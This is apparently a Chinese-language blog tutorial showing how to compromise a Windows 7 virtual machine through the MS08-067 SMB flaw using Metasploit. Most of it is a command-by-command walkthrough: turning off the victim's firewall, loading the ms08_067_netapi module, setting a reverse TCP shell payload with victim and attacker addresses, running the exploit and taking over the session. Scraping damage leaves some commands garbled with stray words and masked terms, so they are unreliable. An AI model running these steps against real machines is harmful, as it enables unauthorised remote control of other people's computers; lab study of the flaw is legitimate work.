課前聲明:
一、本分享僅作學習交流,請自覺遵照法律法規!
二、搜索:Kali 與編程,學習更多網絡***乾貨!
三、Kali 與編程天天準時更新,敬請學習和關注!
正文部分
1、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫作The Metasploit Framework,簡稱叫作MSF。Metasploit做爲全球最受歡迎的工具,不單單是由於它的方便性和強大性,更重要的是它的框架。它容許使用者開發本身的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主機呢?接下來讓咱們一塊兒學習!
2、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3、戰略安排
3.1 在微軟官網查看微軟發佈的關於Windows系統的相關漏洞信息,以下圖所示,這裏咱們重點介紹一下MS08-067漏洞。shell
3.2 在受害者Windows主機中關閉相應的防火牆以及對應的安全衛士,以下圖所示。
步驟:關閉防火牆
命令:Windows鍵+R/輸入cmd/進入dos界面/
命令:firewall.cpl
步驟:關閉防火牆。編程
3.3 查看受害者主機以及***者主機的IP地址,以下圖所示。
命令:ipconfigwindows
命令:ifconfigapi
3.4 進入Metasploit(msf)***框架,以下圖所示。
命令:msfconsole安全
步驟1:檢索關於MS08-067的漏洞利用模塊,以下圖所示。
命令:search ms08-067網絡
步驟2:使用對應的漏洞利用模塊,以下圖所示。
命令:use exploit/windows/smb/ms08_067_netapisession
步驟3:設置漏洞對應的***參數,以下圖所示。
命令:show options(查看有哪些須要設置的***參數)框架
命令:set payload windows/shell/reverse_tcptcp
命令:set rhosts 192.168.126.159(受害者主機)ide
命令:set lhost 192.168.126.186(***者主機)
命令:show target(查看能夠***的系統列表)
命令:set target 34
步驟4:查看參數是否配置成功,以下圖所示。
命令:show option
步驟5:執行漏洞利用模塊,以下圖所示。
命令:exploit
3.5 ***成功,成功拿下目標主機,以下圖所示。
步驟1:查看當前的會話鏈接,以下圖所示。
命令:sessions -l
步驟2:切換會話,以下圖所示。
命令:sessions -i 2
小編一個個字敲打創做,可辛苦了,問君能否關注一下我呢?你還可搜索:Kali與編程,學習更多******技巧呢 !拒絕盜版,轉載請聲明來源:Kali與編程
點我學習更多Kali Linux***測試與網絡***實戰技巧!